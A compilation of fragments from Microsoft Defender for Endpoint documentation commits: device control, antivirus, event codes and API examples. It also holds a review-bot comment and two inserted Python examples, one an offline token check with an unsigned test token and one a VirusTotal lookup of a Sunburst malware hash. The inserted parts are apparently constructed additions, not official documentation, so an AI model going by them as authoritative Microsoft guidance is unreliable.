security Deploy Manage Removable Storage Group Policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-manage-removable-storage-group-policy.md
For this scenario, you need to create two groups: one removable storage group fo
- only need to restrict file system level access Although this case only has one policy, make sure put it under PolicyRules [one XML file](https://github.com/microsoft/mdatp-devicecontrol/blob/main/Removable%20Storage%20Access%20Control%20Samples/Group%20Policy/Block%20Read%20and%20Write%20access%20to%20specific%20file%20_Policy.xml). See step 4 from the [Deploy using group policy](deploy-manage-removable-storage-group-policy.md#deploy-using-group-policy) section to deploy this configuration.
security Deploy Manage Removable Storage Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-manage-removable-storage-intune.md
For this scenario, you need to create two groups: one group for any removable st
Choose **+ Edit Entry** for **Entry**, as shown in the following screenshot: :::image type="content" source="media/208775366-f2cafb54-eb63-4bcd-b0fe-880f3cba2c1b.png" alt-text="Screenshot showing edit mode for an entry." lightbox="media/208775366-f2cafb54-eb63-4bcd-b0fe-880f3cba2c1b.png":::
security Deploy Manage Report Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-manage-report-microsoft-defender-antivirus.md
For reporting, Windows events comprise several security event sources, including
> [!TIP] > **Performance tip** Due to a variety of factors, Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues. You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions. See [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
security Deployment Strategy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deployment-strategy.md
Once you have determined the architecture of your environment and have created a
## Next step After choosing your Defender for Endpoint architecture and deployment method continue to [Step 4 - Onboard devices](onboarding.md).
security Deployment Vdi Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deployment-vdi-microsoft-defender-antivirus.md
If you're looking for information about Defender for Endpoint on non-Windows pla
- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Defender for Endpoint on Android features](android-configure.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Detect Block Potentially Unwanted Apps Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md
For more information, see [Configure and validate exclusions based on file exten
- [Next-generation protection](microsoft-defender-antivirus-in-windows-10.md)
- [Configure behavioral, heuristic, and real-time protection](configure-protection-features-microsoft-defender-antivirus.md)
security Device Control Removable Storage Access Control Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-removable-storage-access-control-faq.md
Yes, for Windows and Mac.
To set up device control on Windows, use [attack surface reduction rules in Defender for Business](/microsoft-365/security/defender-business/mdb-asr). You'll need [Microsoft Intune](/mem/intune/fundamentals/what-is-intune). The standalone version of Defender for Business does not include Intune, but it can be added on. [Microsoft 365 Business Premium](/microsoft-365/business-premium) does include Intune. See [Microsoft Defender for Endpoint Device Control Removable Storage Access Control](device-control-removable-storage-access-control.md).
-To set up device control on Mac, use Intune or Jamf. See [Device Control for macOS](mac-device-control-overview.md).
+To set up device control on Mac, use Intune or Jamf. See [Device Control for macOS](mac-device-control-overview.md).
security Device Control Removable Storage Access Control https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-removable-storage-access-control.md
DeviceEvents
| project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName, ActionType, Policy, PolicyRuleId, FileInformationOperation, MediaClassName, MediaInstanceId, MediaName, MediaProductId, MediaVendorId, MediaSerialNumber, FileName, FolderPath, FileSize, FileEvidenceLocation, AdditionalFields | order by Timestamp desc ```
security Device Control Removable Storage Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-removable-storage-protection.md
To manage external storage, use removable storage access control instead of [dev
**Description** - For more information on Windows, see [BitLocker - Removable Drive Settings](/mem/intune/protect/endpoint-security-disk-encryption-profile-settings).

**Supported Platform** - Windows 10, Windows 11
security Device Control Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-report.md
There might be a delay of up to six hours from the time a media connection occur
security Device Discovery Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-discovery-faq.md
The device discovery capabilities have been built to only discover and identify
### You can exclude network lures from active probing

Standard discovery supports excluding devices or ranges (subnets) from active probing. If you have network lures deployed, you can use the Device Discovery settings to define exclusions based on IP addresses or subnets (a range of IP addresses). Defining those exclusions ensures that those devices aren't actively probed and don't raise alerts. Those devices are discovered using passive methods only (similar to Basic discovery mode).
security Device Discovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-discovery.md
DeviceNetworkEvents
- [Configure device discovery](configure-device-discovery.md)
- [Device discovery FAQs](device-discovery-faq.md)
security Device Health Api Methods Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-api-methods-properties.md
Method|Data type|Description
[Export device antivirus health report](device-health-export-antivirus-health-report-api.md)

[Device health and compliance reporting](device-health-reports.md)
security Device Health Export Antivirus Health Report Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-export-antivirus-health-report-api.md
Here's an example response:
[Export device health methods and properties](device-health-api-methods-properties.md)

[Device health and compliance reporting](device-health-reports.md)
security Device Health Microsoft Defender Antivirus Health https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-microsoft-defender-antivirus-health.md
The following table lays out the possible up to date report values for **Securit
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
> - [Configure Defender for Endpoint on Android features](android-configure.md)
> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Device Health Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-reports.md
To assign these permissions:
- [Create and manage roles for role-based access control](user-roles.md).
- [Export device antivirus health details API methods and properties](device-health-api-methods-properties.md)
security Device Health Sensor Health Os https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-sensor-health-os.md
The Windows version trend graph can help you quickly determine whether your orga
> [Microsoft Defender Antivirus health](device-health-microsoft-defender-antivirus-health.md#microsoft-defender-antivirus-health-tab)
security Device Timeline Event Flag https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-timeline-event-flag.md
While navigating the device timeline, you can search and filter for specific eve
You can apply additional filters by clicking on the time bar. This will only show events prior to the flagged event.

:::image type="content" source="images/device-flag-filter.png" alt-text="Screenshot that shows the device timeline flag with the filter switched on." lightbox="images/device-flag-filter.png":::
security Download Client Analyzer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/download-client-analyzer.md
Learn how to download the Microsoft Defender for Endpoint client analyzer on sup
1. The latest stable edition is integrated into the Defender for Endpoint agent. Ensure that you are running the latest edition for either [macOS](mac-whatsnew.md) or [Linux](linux-whatsnew.md).
2. The latest preview edition is available for direct download from the following URL: <https://aka.ms/XMDEClientAnalyzer>
security Edr In Block Mode https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/edr-in-block-mode.md
The following table lists requirements for EDR in block mode:
- [Tech Community blog: Introducing EDR in block mode: Stopping attacks in their tracks](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/introducing-edr-in-block-mode-stopping-attacks-in-their-tracks/ba-p/1596617) -- [Endpoint detection and response (EDR) in block mode frequently asked questions (FAQ)](edr-block-mode-faqs.yml)
+- [Endpoint detection and response (EDR) in block mode frequently asked questions (FAQ)](edr-block-mode-faqs.yml)
security Enable Attack Surface Reduction https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-attack-surface-reduction.md
Example:
- [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
- [Evaluate attack surface reduction](evaluate-attack-surface-reduction.md)
- [Attack surface reduction FAQ](attack-surface-reduction.md)
security Enable Cloud Protection Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus.md
For more information about allowed parameters, see [Windows Defender WMIv2 APIs]
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
> - [Configure Defender for Endpoint on Android features](android-configure.md)
> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Enable Controlled Folders https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-controlled-folders.md
Use `Disabled` to turn off the feature.
- [Protect important folders with controlled folder access](controlled-folders.md)
- [Customize controlled folder access](customize-controlled-folders.md)
- [Evaluate Microsoft Defender for Endpoint](evaluate-mde.md)
security Enable Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-exploit-protection.md
For information about customizing the notification when a rule is triggered and
- [Evaluate exploit protection](evaluate-exploit-protection.md)
- [Configure and audit exploit protection mitigations](customize-exploit-protection.md)
- [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security Enable Network Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-network-protection.md
Use the following procedure to enable network protection on domain-joined comput
- [Evaluate network protection](evaluate-network-protection.md)
- [Troubleshoot network protection](troubleshoot-np.md)
security Enable Troubleshooting Mode https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode.md
DeviceEvents
- [Troubleshooting mode scenarios](troubleshooting-mode-scenarios.md)
- [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)
security Enable Update Mdav To Latest Ws https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-update-mdav-to-latest-ws.md
As a local administrator on the server, perform the following steps:
## Related articles

[Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security Endpoint Attack Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/endpoint-attack-notifications.md
You can create rules to send email notifications for notification recipients. Se
## Next steps

- To proactively hunt threats across endpoints, Office 365, cloud applications, and identity, refer to [Microsoft Defender Experts for Hunting](../defender/defender-experts-for-hunting.md).
security Evaluate Controlled Folder Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-controlled-folder-access.md
See [Protect important folders with controlled folder access](controlled-folders
* [Protect important folders with controlled folder access](controlled-folders.md)
* [Evaluate Microsoft Defender for Endpoint](evaluate-mde.md)
* [Use audit mode](audit-windows-defender.md)
security Evaluate Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-exploit-protection.md
To review which apps would have been blocked, open Event Viewer and filter for t
- [Configure and audit exploit protection mitigations](customize-exploit-protection.md)
- [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
- [Troubleshoot exploit protection](troubleshoot-exploit-protection-mitigations.md)
security Evaluate Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-mde.md
Next-generation protection helps detect and block the latest threats.
## See Also

[Microsoft Defender for Endpoint overview](microsoft-defender-endpoint.md)
security Evaluate Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-microsoft-defender-antivirus.md
You can also download a PowerShell that will enable all the settings described i
## Related topics - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)
+- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)
security Evaluate Network Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-network-protection.md
To review apps that would have been blocked, open Event Viewer and filter for Ev
- [Enable network protection](enable-network-protection.md)
- [Troubleshoot network protection](troubleshoot-np.md)
security Evaluation Lab https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluation-lab.md
Your feedback helps us get better in protecting your environment from advanced a
Let us know what you think, by selecting **Provide feedback**.

:::image type="content" source="images/send-us-feedback-eval-lab.png" alt-text="The feedback page" lightbox="images/send-us-feedback-eval-lab.png":::
security Event Error Codes https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/event-error-codes.md
See the following table for a list of events recorded by the service.
|32|Microsoft Defender for Endpoint service failed to request to stop itself after offboarding process. Failure code: %1|An error occurred during offboarding.|Reboot the device.| |33|Microsoft Defender for Endpoint service failed to persist SENSE GUID. Failure code: `variable`.|A unique identifier is used to represent each device that is reporting to the portal. <p> If the identifier doesn't persist, the same device might appear twice in the portal.|Check registry permissions on the device to ensure the service can update the registry.| |34|Microsoft Defender for Endpoint service failed to add itself as a dependency on the Connected User Experiences and Telemetry service, causing onboarding process to fail. Failure code: `variable`.|An error occurred with the Windows telemetry service.|[Ensure the diagnostic data service is enabled](troubleshoot-onboarding.md#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy). <p> Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <p> See [Onboard Windows client devices](configure-endpoints.md).|
- |35|Microsoft Defender for Endpoint service failed to remove itself as a dependency on the Connected User Experiences and Telemetry service. Failure code: `variable`.|An error occurred with the Windows telemetry service during offboarding. The offboarding process continues.|Check for errors with the Windows diagnostic data service.|
+ |35| Communication quotas are updated. Disk quota in MB: `variable`, daily upload quota in MB: `variable`| Variable = disk quota in MB. |Normal operating notification; no action required.|
|36|Microsoft Defender for Endpoint Connected User Experiences and Telemetry service registration succeeded. Completion code: `variable`.|Registering Defender for Endpoint with the Connected User Experiences and Telemetry service completed successfully.|Normal operating notification; no action required.| |37|Microsoft Defender for Endpoint A module is about to exceed its quota. Module: %1, Quota: {%2} {%3}, Percentage of quota utilization: %4.|The device has almost used its allocated quota of the current 24-hour window. It's about to be throttled.|Normal operating notification; no action required.| |38|Network connection is identified as low. Microsoft Defender for Endpoint will contact the server every %1 minutes. Metered connection: %2, internet available: %3, free network available: %4.|The device is using a metered/paid network and will be contacting the server less frequently.|Normal operating notification; no action required.|
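Review bot: the new row 35's Description column ("Variable = disk quota in MB") explains only the first placeholder, while the message text carries two (disk quota and daily upload quota); describe both values. Also, the previous row 35 (service failed to remove itself as a dependency on the Connected User Experiences and Telemetry service during offboarding) is dropped rather than renumbered, so that offboarding failure no longer has a documented cause or action; if the event still exists under another ID, re-add it there.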
You can use this table for more information on the Defender for Endpoint events
- [Client analyzer overview](overview-client-analyzer.md)
- [Download and run the client analyzer](download-client-analyzer.md)
- [Understand the analyzer HTML report](analyzer-report.md)
security Exclude Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exclude-devices.md
You'll be able to stop excluding a device at any time. Once devices are no longe
## See also

- [Device inventory](machines-view-overview.md)
security Experts On Demand https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/experts-on-demand.md
It's crucial to respond quickly to keep the investigation moving.
- To proactively hunt threats across endpoints, refer to [Endpoint Attack Notification](../defender-endpoint/endpoint-attack-notifications.md).
- To proactively hunt threats across endpoints, Office 365, cloud applications, and identity, refer to [Microsoft Defender Experts for Hunting](../defender/defender-experts-for-hunting.md).
security Exploit Protection Reference https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exploit-protection-reference.md
This mitigation is incompatible with the Arbitrary Code Guard mitigation.
### Configuration options

**Audit Only** - You can enable this mitigation in audit mode to measure the potential compatibility impact on an application. Audit events can then be viewed either in Event Viewer or by using advanced hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
security Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exploit-protection.md
The table in this section indicates the availability and support of native mitig
- [Configure and audit exploit protection mitigations](customize-exploit-protection.md)
- [Troubleshoot exploit protection](troubleshoot-exploit-protection-mitigations.md)
- [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security Export Certificate Inventory Assessment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/export-certificate-inventory-assessment.md
GET https://api.securitycenter.contoso.com/api/machines/certificateAssessmentExp
"generatedTime":"2022-03-20T13:18:00Z" } ```
security Export Firmware Hardware Assessment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/export-firmware-hardware-assessment.md
GET https://api.security.microsoft.com/api/machines/HardwareFirmwareInventoryExp
} ```
security Export Security Baseline Assessment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/export-security-baseline-assessment.md
GET https://api.securitycenter.microsoft.com/api/machines/BaselineComplianceAsse
- [Get security baselines assessment profiles](get-security-baselines-assessment-profiles.md)
- [Get security baselines assessment configurations](get-security-baselines-assessment-configurations.md)
security Exposed Apis Create App Nativeapp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-create-app-nativeapp.md
Verify that you got a correct token:
- [Microsoft Defender for Endpoint APIs](exposed-apis-list.md)
- [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md)
security Exposed Apis Create App Partners https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-create-app-partners.md
Sanity check to make sure you got a correct token:
- [Supported Microsoft Defender for Endpoint APIs](exposed-apis-list.md)
- [Access Microsoft Defender for Endpoint on behalf of a user](exposed-apis-create-app-nativeapp.md)
security Exposed Apis Create App Webapp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-create-app-webapp.md
var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
## See also

- [Supported Microsoft Defender for Endpoint APIs](exposed-apis-list.md)
- [Access Microsoft Defender for Endpoint on behalf of a user](exposed-apis-create-app-nativeapp.md)
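The three app-registration articles above (native app, partner app, web app) each end with a "sanity check" of the access token: paste it into a JWT decoder and confirm the audience and the roles or scopes. The following is an added example, not code from the Microsoft docs, that does that check offline in Python so it can run in a script before the first API call. The expected audience value `https://api.securitycenter.microsoft.com` and the permission names `Alert.Read.All` and `Machine.Read.All` are assumptions; `make_unsigned_token` builds a constructed token with a dummy signature purely for local testing.

```python
"""Offline sanity check of an access token before calling the Defender for
Endpoint API: decode the payload and confirm audience, expiry and the
roles/scopes the call needs. Added example; not from the Microsoft docs."""
import base64
import json
import time
from typing import Iterable, List, Optional

# Assumed: the resource the token must be issued for (the 'aud' claim).
MDE_API_AUDIENCE = "https://api.securitycenter.microsoft.com"


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_claims(token: str) -> dict:
    """Return the payload claims of a compact JWT.

    The signature is deliberately NOT verified here: the API validates it.
    This is only a local check that the token you obtained is the one you meant.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a compact JWT of the form header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def check_token(token: str, required_roles: Iterable[str] = (),
                required_scopes: Iterable[str] = (),
                now: Optional[float] = None) -> List[str]:
    """Return a list of problems; an empty list means the token looks usable.

    Application-context tokens carry permissions in 'roles'; delegated
    (on-behalf-of-user) tokens carry them space-separated in 'scp'.
    """
    claims = decode_jwt_claims(token)
    now = time.time() if now is None else now
    problems = []
    if claims.get("aud") != MDE_API_AUDIENCE:
        problems.append(f"unexpected audience {claims.get('aud')!r}")
    if float(claims.get("exp", 0)) <= now:
        problems.append("token is expired")
    missing_roles = set(required_roles) - set(claims.get("roles", []))
    if missing_roles:
        problems.append(f"missing application roles: {sorted(missing_roles)}")
    missing_scopes = set(required_scopes) - set(claims.get("scp", "").split())
    if missing_scopes:
        problems.append(f"missing delegated scopes: {sorted(missing_scopes)}")
    return problems


def make_unsigned_token(claims: dict) -> str:
    """Constructed token with a dummy signature, for offline testing only."""
    def enc(obj: dict) -> str:
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    header = enc({"alg": "none", "typ": "JWT"})
    return f"{header}.{enc(claims)}.signature"


if __name__ == "__main__":
    # Constructed claims shaped like an app-only token for the MDE API.
    demo = make_unsigned_token({
        "aud": MDE_API_AUDIENCE,
        "exp": int(time.time()) + 3600,
        "roles": ["Alert.Read.All", "Machine.Read.All"],  # assumed permission names
    })
    print(check_token(demo, required_roles=["Alert.Read.All"]) or "token looks usable")
```

Run `check_token` on the real token returned by your token request, passing the roles (application context) or scopes (user context) the API call needs; an empty list means the audience, expiry and permissions match, and any other result tells you which part of the app registration or token request to fix before you get a 401 or 403 from the API.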
security Exposed Apis Full Sample Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-full-sample-powershell.md
$response
- [Microsoft Defender for Endpoint APIs](apis-intro.md)
- [Advanced Hunting API](run-advanced-query-api.md)
- [Advanced Hunting using Python](run-advanced-query-sample-python.md)
security Exposed Apis List https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-list.md
Topic | Description
- [Microsoft Defender for Endpoint APIs](apis-intro.md)
- [Microsoft Defender for Endpoint API release notes](api-release-notes.md)
security Exposed Apis Odata Samples https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-odata-samples.md
json{
## See also

[Microsoft Defender for Endpoint APIs](apis-intro.md)
security Feedback Loop Blocking https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/feedback-loop-blocking.md
If your organization is using Defender for Endpoint, feedback-loop blocking is e
- [(Blog) Behavioral blocking and containment: Transforming optics into protection](https://www.microsoft.com/security/blog/2020/03/09/behavioral-blocking-and-containment-transforming-optics-into-protection/)
- [Helpful Microsoft Defender for Endpoint resources](/microsoft-365/security/defender-endpoint/helpful-resources)
security Fetch Alerts Mssp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/fetch-alerts-mssp.md
For information on how to fetch alerts using REST API, see [Fetch alerts from MS
- [Grant MSSP access to the portal](grant-mssp-access.md)
- [Access the MSSP customer portal](access-mssp-portal.md)
- [Configure alert notifications](configure-mssp-notifications.md)
security Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/files.md
Method|Return Type |Description
"determinationValue": "PUA:Win32/FusionCore" } ```
security Find Defender Malware Name https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-defender-malware-name.md
To find the detection name of a malware family, you'll need to search the intern
For example, search for the "Sunburst cyberattack hash". One of the websites returned in the search results should have the hash. In this example, the hash is **a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc**. Then, look up this hash in [VirusTotal](https://www.virustotal.com/). In the Microsoft row, you'll see that this malware is detected as **Trojan:MSIL/Solorigate.BR!dha**. Searching for that name on the Microsoft Defender Security Intelligence website gives you information specific to that malware, including technical details and mitigation steps.
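The same hash-to-detection-name pivot can be scripted instead of read off the VirusTotal web page. The following is an added example, not code from the Microsoft docs: it reads the Microsoft engine's verdict out of a VirusTotal API v3 file report and falls back to a constructed sample report when no API key is present. The v3 endpoint, the `x-apikey` header, the `last_analysis_results` layout and the `category` values are assumptions about VirusTotal's API; the sample report is constructed to match the Sunburst example above and is not a live lookup.

```python
"""Pivot from a file hash to the Microsoft detection name using a VirusTotal
API v3 file report. Added example; endpoint and response layout are assumed."""
import json
import os
import urllib.request
from typing import Optional

VT_FILE_REPORT = "https://www.virustotal.com/api/v3/files/{}"  # assumed endpoint
SUNBURST_SHA256 = "a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc"

# Constructed excerpt of a v3 file report; only the fields this example reads.
SAMPLE_REPORT = {
    "data": {
        "attributes": {
            "last_analysis_results": {
                "Microsoft": {"category": "malicious",
                              "result": "Trojan:MSIL/Solorigate.BR!dha"},
                "OtherVendor": {"category": "undetected", "result": None},
            }
        }
    }
}


def microsoft_detection_name(report: dict) -> Optional[str]:
    """Return Microsoft's detection name from a v3 file report, or None if the
    Microsoft engine did not flag the file (or the report lacks that engine)."""
    results = (report.get("data", {}).get("attributes", {})
               .get("last_analysis_results", {}))
    entry = results.get("Microsoft") or {}
    # Assumed category values; anything else (undetected, timeout...) is "no name".
    if entry.get("category") not in ("malicious", "suspicious"):
        return None
    return entry.get("result")


def fetch_file_report(sha256: str, api_key: str) -> dict:
    """Live lookup; needs a VirusTotal API key sent in the x-apikey header."""
    if len(sha256) != 64 or any(c not in "0123456789abcdef" for c in sha256.lower()):
        raise ValueError("expected a hex SHA-256")
    req = urllib.request.Request(VT_FILE_REPORT.format(sha256.lower()),
                                 headers={"x-apikey": api_key})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


if __name__ == "__main__":
    key = os.environ.get("VT_API_KEY")  # assumed environment variable name
    report = fetch_file_report(SUNBURST_SHA256, key) if key else SAMPLE_REPORT
    print(microsoft_detection_name(report) or "not detected by Microsoft")
```

With the detection name in hand, the next step is the same as in the text: search for it on the Microsoft Defender Security Intelligence website for the family write-up and mitigation steps.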
security Find Machine Info By Ip https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-machine-info-by-ip.md
Content-type: application/json
... } ```
security Find Machines By Ip https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-machines-by-ip.md
Here's an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/machines/findbyip(ip='10.248.240.38',timestamp=2019-09-22T08:44:05Z)
```
security Find Machines By Tag https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-machines-by-tag.md
Here's an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/machines/findbytag?tag=testTag&useStartsWithFilter=true
```
security Fix Unhealthy Sensors https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/fix-unhealthy-sensors.md
If you took corrective actions and the device status is still misconfigured, [op
- [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md)
- [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)
security Get Alert Info By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-info-by-id.md
Empty
## Response

If successful, this method returns 200 OK and the [alert](alerts.md) entity in the response body. If no alert with the specified ID is found, it returns 404 Not Found.
security Get Alert Related Domain Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-domain-info.md
Here's an example of the response.
] } ```
security Get Alert Related Files Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-files-info.md
Here is an example of the response.
] } ```
security Get Alert Related Ip Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-ip-info.md
Here's an example of the response.
] } ```
security Get Alert Related Machine Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-machine-info.md
Here is an example of the response.
] } ```
security Get Alert Related User Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-user-info.md
Here is an example of the response.
"isOnlyNetworkUser": false } ```
security Get Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alerts.md
Here is an example of the response.
## See also

[OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security Get All Recommendations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-recommendations.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Vulnerability management security recommendations](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get All Scan Agents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-scan-agents.md
Here is an example of the response.
] } ```
security Get All Scan Definitions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-scan-definitions.md
Here is an example of the response.
] } ```
